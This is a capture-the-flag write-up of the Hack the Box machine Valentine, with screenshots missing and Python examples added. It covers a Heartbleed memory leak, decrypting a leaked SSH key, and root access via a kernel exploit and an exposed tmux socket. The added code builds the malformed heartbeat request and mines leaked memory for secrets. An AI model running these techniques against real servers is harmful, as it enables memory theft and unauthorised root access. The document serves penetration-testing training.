Friday, March 22, 2019

Valentine


VALENTINE

- Layout for this exercise:





1 - INTRODUCTION

-  The goal of this exercise is to develop a hacking process for the vulnerable machine Valentine, which is a retired machine from the Hack the Box pentesting platform:

https://www.hackthebox.eu


2 - ENUMERATION

- Valentine's IP is 10.10.10.79:




- Scanning with Nmap:







- Connecting with the browser to port 80, the image is very reminiscent of the Heartbleed logo:





- Same thing with HTTPS at port 443:





- There is a lot of information available about Heartbleed vulnerability:

http://heartbleed.com/

https://en.wikipedia.org/wiki/Heartbleed


- The Nmap ssl-heartbleed NSE script confirms the Heartbleed vulnerability:





- Dirbusting Valentine's web server:





- Checking folder /encode:






- Checking folder /decode:




- Going to /dev:




- Reading notes.txt:




- Reading hype_key:





- Copying hype_key locally:





- Because hype_key is hex-encoded (two hex digits per byte), let's decode it, for instance with xxd -r -p:




- It seems that we are dealing with an RSA private key, and an encrypted one: a passphrase is needed before it can be used for SSH. Copying it locally:
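As an added example (not part of the original write-up), the following Python reproduces the two checks above offline: it turns a space-separated hex dump back into bytes, reads the PEM header to learn what kind of key it is and whether it is passphrase-protected, and shows how OpenSSL derives the AES key from a passphrase for such a legacy encrypted PEM file. The hex dump, the salt in the DEK-Info line and the key body are constructed stand-ins, not the real hype_key.

```python
import hashlib
import re

# Constructed stand-in for hype_key (NOT the real file): a legacy OpenSSL PEM
# with the encryption headers such a key carries. Salt and body are dummies.
SAMPLE_PEM = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF\n"
    "\n"
    "ZHVtbXkgYm9keSwgbm90IGEgcmVhbCBrZXk=\n"
    "-----END RSA PRIVATE KEY-----\n"
)
# The way the file was served: one hex pair per byte, separated by spaces.
SAMPLE_HEX = " ".join(f"{b:02x}" for b in SAMPLE_PEM.encode())

# Key sizes for the ciphers OpenSSL writes into DEK-Info lines.
KEY_LENGTHS = {"AES-128-CBC": 16, "AES-192-CBC": 24, "AES-256-CBC": 32, "DES-EDE3-CBC": 24}


def decode_hex_blob(text):
    """Turn a hex dump back into bytes, ignoring spaces, newlines and offsets."""
    digits = re.sub(r"[^0-9a-fA-F]", "", text)
    if len(digits) % 2:
        raise ValueError("odd number of hex digits: not a clean hex dump")
    return bytes.fromhex(digits)


def parse_pem(data):
    """Report the PEM label and whether/how the key is passphrase-protected."""
    text = data.decode("ascii", errors="replace")
    m = re.search(r"-----BEGIN ([A-Z ]+)-----", text)
    if not m:
        return {"pem": False}
    info = {"pem": True, "label": m.group(1), "encrypted": False}
    if "Proc-Type: 4,ENCRYPTED" in text:  # legacy (PKCS#1) encrypted PEM
        info["encrypted"] = True
        dek = re.search(r"DEK-Info: ([A-Z0-9-]+),([0-9A-Fa-f]+)", text)
        if dek:
            info["cipher"] = dek.group(1)
            info["iv"] = bytes.fromhex(dek.group(2))
    elif info["label"] == "ENCRYPTED PRIVATE KEY":  # PKCS#8: parameters sit inside the DER
        info["encrypted"] = True
    return info


def evp_bytes_to_key(passphrase, salt, key_len):
    """OpenSSL EVP_BytesToKey with MD5 and one iteration, as used for DEK-Info PEMs:
    D_0 = MD5(pass||salt), D_i = MD5(D_{i-1}||pass||salt), key = D_0||D_1||... truncated."""
    out, prev = b"", b""
    while len(out) < key_len:
        prev = hashlib.md5(prev + passphrase + salt).digest()
        out += prev
    return out[:key_len]


def derive_key_material(info, passphrase):
    """(key, iv) that 'openssl rsa' uses to decrypt a legacy encrypted PEM, or None."""
    if not info.get("encrypted") or "cipher" not in info:
        return None
    iv = info["iv"]
    key = evp_bytes_to_key(passphrase, iv[:8], KEY_LENGTHS[info["cipher"]])  # salt = first 8 IV bytes
    return key, iv


if __name__ == "__main__":
    pem = decode_hex_blob(SAMPLE_HEX)
    details = parse_pem(pem)
    print(details["label"], "encrypted" if details["encrypted"] else "cleartext", details.get("cipher"))
    key, iv = derive_key_material(details, b"heartbleedbelievethehype")
    print("AES key:", key.hex(), "IV:", iv.hex())
```

The actual decryption is then AES-128-CBC with that key and IV over the Base64 body, which is what `openssl rsa -in hype_key -out hype_key_dec` does when it prompts for the passphrase; a wrong passphrase normally ends in a padding error ("bad decrypt"). Because the derivation is a single unsalted-per-guess MD5, such keys are also cheap to attack offline, so a weak passphrase on a private key is not much protection.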




3 - EXPLOITATION

- Looking for an exploit related to the Heartbleed vulnerability:







- Copying the Python script 32764.py to the working folder:





- Now, launching the script against Valentine's IP:



..................................





- The leaked memory in the response includes a Base64-encoded string:








- Decoding the string we get a plaintext string: heartbleedbelievethehype
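An added example, not from the original post nor from 32764.py: it builds the malformed heartbeat record that such a script sends (declared payload length 0x4000 with no payload bytes), classifies a server's reply, and pulls printable runs and Base64 tokens out of the leaked memory, which is the step done by hand above. The TLS handshake that must precede the heartbeat is left out, and the server reply is a constructed byte string containing a Base64 token, not Valentine's real memory.

```python
import base64
import re
import struct

TLS_HEARTBEAT, TLS_ALERT = 0x18, 0x15
HB_REQUEST, HB_RESPONSE = 1, 2
TLS_VERSION = (3, 2)  # TLS 1.1, the version the public PoC speaks


def tls_record(content_type, body, version=TLS_VERSION):
    """Wrap a body in a TLS record header: type(1) version(2) length(2)."""
    return struct.pack("!BBBH", content_type, version[0], version[1], len(body)) + body


def build_heartbeat_request(claimed_len=0x4000, payload=b""):
    """The trigger: a heartbeat whose declared payload_length exceeds the bytes sent.
    A patched server drops it (RFC 6520 length check); an unpatched one copies
    claimed_len bytes from its own heap into the reply."""
    return tls_record(TLS_HEARTBEAT, struct.pack("!BH", HB_REQUEST, claimed_len) + payload)


def parse_tls_records(data):
    """Split a byte stream into (content_type, version, body); stop at a truncated record."""
    records, off = [], 0
    while off + 5 <= len(data):
        ctype, vmaj, vmin, length = struct.unpack("!BBBH", data[off:off + 5])
        body = data[off + 5:off + 5 + length]
        if len(body) < length:
            break
        records.append((ctype, (vmaj, vmin), body))
        off += 5 + length
    return records


def classify_response(data, sent_payload=b""):
    """Return (verdict, leaked_bytes). Leaked bytes are whatever the server returned
    beyond an echo of the payload we actually sent."""
    for ctype, _version, body in parse_tls_records(data):
        if ctype == TLS_ALERT:
            return "rejected", b""
        if ctype == TLS_HEARTBEAT and body and body[0] == HB_RESPONSE:
            declared = struct.unpack("!H", body[1:3])[0]
            payload = body[3:3 + declared]
            if declared > len(sent_payload):
                return "vulnerable", payload[len(sent_payload):]
            return "not-vulnerable", b""
    return "no-heartbeat", b""


def extract_strings(leak, min_len=8):
    """Printable runs in the leak, the equivalent of running strings(1) on the dump."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, leak)]


def find_base64_tokens(leak, min_len=16):
    """Base64-looking runs that decode to text, the step done by hand in the write-up."""
    found = []
    for m in re.finditer(rb"[A-Za-z0-9+/]{%d,}={0,2}" % min_len, leak):
        token = m.group()
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:  # binascii.Error: wrong length or bad characters
            continue
        if raw and all(0x20 <= b < 0x7f or b in b"\r\n\t" for b in raw):
            found.append((token.decode(), raw.decode().strip()))
    return found


# Constructed reply (not Valentine's memory): a heartbeat response echoing nothing
# we sent, padded with junk, an HTTP fragment and a Base64 form value.
SAMPLE_LEAK = (
    b"\x00" * 12
    + b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    + b"$text=" + base64.b64encode(b"heartbleedbelievethehype")
    + b"\x00" * 8 + b"\xff\xfe" * 4
)
SAMPLE_RESPONSE = tls_record(
    TLS_HEARTBEAT, struct.pack("!BH", HB_RESPONSE, len(SAMPLE_LEAK)) + SAMPLE_LEAK + b"\x00" * 16
)


def run_demo(response=SAMPLE_RESPONSE):
    """Verdict and decoded Base64 findings for a captured heartbeat reply."""
    verdict, leak = classify_response(response)
    return verdict, find_base64_tokens(leak)


if __name__ == "__main__":
    print("request:", build_heartbeat_request().hex())
    verdict, tokens = run_demo()
    print(verdict, tokens)
```

On a real target the leak is whatever happened to sit in the heap next to the heartbeat buffer, so the interesting string is not guaranteed to show up on the first try; the PoC is usually run several times and the output searched for form fields, cookies or session identifiers.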





- Going back to the encrypted key, let's see whether openssl can decrypt it using the string heartbleedbelievethehype as the passphrase:




- The decrypted SSH key:





- SSH-ing into Valentine as user hype with the decrypted key (the key file must be chmod 600, otherwise ssh refuses to use it):





- The remote shell is low privileged:






4 - CAPTURING THE 1st FLAG

- Reading user.txt:




5 - PRIVILEGE ESCALATION

- Let's try two ways of escalating privileges (a kernel exploit can crash the target, so the misconfiguration route in 5.2 is the safer one when it is available):


5.1 - Kernel exploitation

- First, checking Operating System version and Kernel number:








- There are some public exploits for the Linux 3.2 kernel, for instance this one:






- Downloading to Kali and transferring to Valentine:







- Compiling according to the instructions:







- Now the exploit asks for a password for the new user it creates, for instance hello:







- Switching to the user firefart with the new password hello, we get a root shell:





5.2 - Tmux

- Reading the hidden file .bash_history, there is a reference to a tmux command:








- Also, ps aux confirms that there is a tmux session running as root:




- Finally, just running the tmux command found in .bash_history attaches us to that root-owned session, which gives a root shell (this works because the socket the session was started on is accessible to hype):
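Added example, not the original author's code: it automates the two checks above for a scripted enumeration pass, parsing shell history and ps output for a root-owned tmux server started with an explicit -S socket, and then testing whether that socket is actually reachable from the current user. The history line, the ps lines and the /tmp/example_dev_sess path are constructed; Valentine's real socket path is not reproduced here.

```python
import os
import re
import socket
import stat
import tempfile

# Constructed evidence (not Valentine's real history or process list): a history
# line and a ps aux line for a tmux server started on a custom socket path.
SAMPLE_HISTORY = "ls -la\ntmux -S /tmp/example_dev_sess\nexit\n"
SAMPLE_PS = (
    "USER  PID %CPU %MEM  VSZ  RSS TTY STAT START TIME COMMAND\n"
    "root    1  0.0  0.1 1234  567 ?     Ss   10:00 0:00 /sbin/init\n"
    "root 1010  0.0  0.2 2345  678 ?     Ss   10:01 0:00 tmux -S /tmp/example_dev_sess\n"
    "hype 2020  0.0  0.1 3456  789 pts/0 S    10:05 0:00 bash\n"
)

# tmux -S <path> names the server socket explicitly; without -S it lives under
# /tmp/tmux-<uid>/, a directory only its owner can enter.
TMUX_SOCKET_RE = re.compile(r"\btmux\b[^\n]*?-S\s+(\S+)")


def tmux_sockets_from_history(history_text):
    """Socket paths mentioned in shell history via tmux -S <path>."""
    return sorted({m.group(1) for m in TMUX_SOCKET_RE.finditer(history_text)})


def root_tmux_servers(ps_output):
    """(pid, socket_path) for tmux processes running as root with an explicit socket."""
    servers = []
    for line in ps_output.splitlines()[1:]:
        cols = line.split(None, 10)  # 11th column is the full command line
        if len(cols) < 11 or cols[0] != "root":
            continue
        m = TMUX_SOCKET_RE.search(cols[10])
        if m:
            servers.append((int(cols[1]), m.group(1)))
    return servers


def socket_access(path):
    """Whether 'tmux -S <path> attach' can work from this user, and if not, why."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return "missing"
    if not stat.S_ISSOCK(st.st_mode):
        return "not-a-socket"
    if os.access(path, os.R_OK | os.W_OK):
        return "attachable"
    return "permission-denied"


def make_demo_socket(mode=0o666):
    """Throwaway unix socket standing in for a running server, so the check runs offline."""
    path = os.path.join(tempfile.mkdtemp(), "dev_sess")
    srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    srv.bind(path)
    os.chmod(path, mode)
    return srv, path


def candidate_root_sockets(history_text, ps_output):
    """Cross-reference: sockets that appear in history AND belong to a root tmux server."""
    from_ps = {p for _pid, p in root_tmux_servers(ps_output)}
    return [p for p in tmux_sockets_from_history(history_text) if p in from_ps]


if __name__ == "__main__":
    for path in candidate_root_sockets(SAMPLE_HISTORY, SAMPLE_PS):
        print(path, socket_access(path))  # "missing" here: the sample path is not real
    srv, demo = make_demo_socket()
    print(demo, socket_access(demo))
    srv.close()
```

Before attaching, `tmux -S <path> ls` lists the sessions without touching them; attaching to a live session is visible to whoever else is using it. The weakness is not tmux itself but a root server left on a socket that other users can read and write, which the default per-user 0700 socket directory would have prevented.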








6 - CAPTURING THE 2nd FLAG

- Reading root.txt: